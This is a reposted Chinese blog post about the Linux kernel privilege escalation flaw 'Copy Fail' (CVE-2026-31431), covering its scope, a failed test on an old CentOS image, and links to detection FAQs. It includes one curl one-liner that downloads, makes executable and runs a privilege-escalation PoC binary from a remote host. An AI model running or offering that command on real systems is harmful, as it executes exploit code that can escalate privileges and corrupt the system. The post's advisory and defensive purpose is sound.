Copy Fail(CVE-2026-31431):732字节脚本提权linux

作者:网安杂谈 发布:2026-05-01 13:37 收录:2026-09-03 14:14 1 次阅读 约 454 字
摘要:近期披露的Linux内核高危本地提权漏洞(Copy Fail,CVE-2026-31431)由 Xint Co
推荐理由:本文涵盖「Linux提权」、「CVE-2026-31431」、「内核漏洞」等多个主题,重点关注 Linux提权。
近期披露的Linux内核高危本地提权漏洞(Copy Fail,CVE-2026-31431)由 Xint Code 团队发现,源于一处隐蔽且易触发的内核逻辑缺陷。攻击者在具备本地访问条件下,可稳定实现权限提升并获取系统最高权限。

该漏洞利用代码(PoC)已公开,显著降低攻击门槛。其影响可追溯至 2017 年,覆盖主流 Linux 发行版,并波及云服务器、容器宿主机、多租户环境以及各类基于 Linux 的嵌入式设备(如物联网终端、工控设备和网络设备),整体风险范围广、危害等级高。

利用demo视频来自Copy Fail (CVE-2026-31431) 官网


看资料觉得该漏洞的利用相当简单,于是翻出一个陈年centos镜像(3.10.0-1160.66.1.el7.x86_64)仿真起来试了试,竟然不受影响(版本太老了)!后面再找个嵌入式设备的镜像试一试。


人工验真!Linux提权漏洞,影响这么多信创!(附稳定验证PoC)
微步给的验证POC注意禁止线上环境进行验证验证程序可能会损坏系统su命令内存映像
curl -fsSL https://onesandbox-release.threatbook.cn/poc/CVE-2026-31431/copyfail -o /tmp/copyfail && chmod +x /tmp/copyfail && /tmp/copyfail && rm -f /tmp/copyfail
在某些取证场景下,确实还挺有用的。
那么如何发现该漏洞利用的痕迹呢?参考安天科技的分析:
CVE-2026-31431(Copy Fail)漏洞FAQ(上)——漏洞的基本情况、影响范围与处置篇
CVE-2026-31431(Copy Fail)漏洞FAQ(下)——漏洞技术机理、历史坐标与战略启示篇
自动化利用工具肯定也已经出来了,大家做好防护,五一劳动节快乐!

转载声明:本文转载自原发布平台 (作者:网安杂谈), 原文标题《Copy Fail(CVE-2026-31431):732字节脚本提权linux》, 查看原文。 版权归原作者及原发布平台所有,本站仅作收录与展示,未对正文内容作实质性修改; 若涉及侵权请联系本站处理。